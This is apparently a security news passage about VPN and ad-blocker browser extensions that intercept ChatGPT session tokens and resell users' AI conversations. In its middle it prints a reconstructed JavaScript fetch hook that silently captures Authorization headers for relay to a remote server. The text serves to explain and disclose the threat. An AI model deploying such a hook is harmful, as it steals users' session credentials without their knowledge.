The tools were designed to intercept users' ChatGPT session authentication tokens and send them to a remote server, but they don't exploit any ChatGPT vulnerability to do so. Instead, they inject a content script into chatgpt.com and execute it in the MAIN JavaScript world, where it runs in the same context as the page's own code. The script monitors outbound requests initiated by the web application, identifies and extracts Authorization headers, and passes them to a second content script, which exfiltrates them to the remote server.
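The mechanism described above can be sketched in a few lines. This is an illustrative reconstruction, not code from the actual extensions: the function and event names below are hypothetical. A content script registered with `"world": "MAIN"` in a Manifest V3 extension runs alongside the page's own scripts, so it can wrap `window.fetch` and read the Authorization header off every outbound request before forwarding the request unchanged:

```javascript
// Hypothetical sketch of a MAIN-world token interceptor.
// hookFetch() wraps a fetch implementation so that any request carrying
// an Authorization header has that header copied to onToken() before
// the real request proceeds. In an extension this would run against
// window, with onToken relaying the value (e.g. via postMessage) to an
// isolated-world content script that forwards it to a remote server.
function hookFetch(target, onToken) {
  const realFetch = target.fetch.bind(target);
  target.fetch = async function (input, init = {}) {
    // Headers may live on a Request object or in the init options;
    // the Headers class normalizes name casing for us.
    const headers = new Headers(
      (input instanceof Request ? input.headers : init.headers) || {}
    );
    const auth = headers.get("authorization");
    if (auth) {
      onToken(auth); // token captured before the request even leaves
    }
    return realFetch(input, init); // page behavior is unaffected
  };
}
```

Because the wrapper calls the original `fetch` and returns its result untouched, the page works exactly as before, which is why users see no symptoms. The isolated-world half of the pair is what holds the extension's network privileges and ships the captured tokens out.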
Browser extensions that promise privacy have been found selling the AI conversations of millions of users. Security researchers at Koi Security discovered that popular VPN and ad-blocker extensions secretly intercept conversations with ChatGPT, Claude, and Gemini and resell them to data brokers. Researcher Idan Dardikman uncovered the problem after wondering whether anyone could read his private conversations with AI assistants.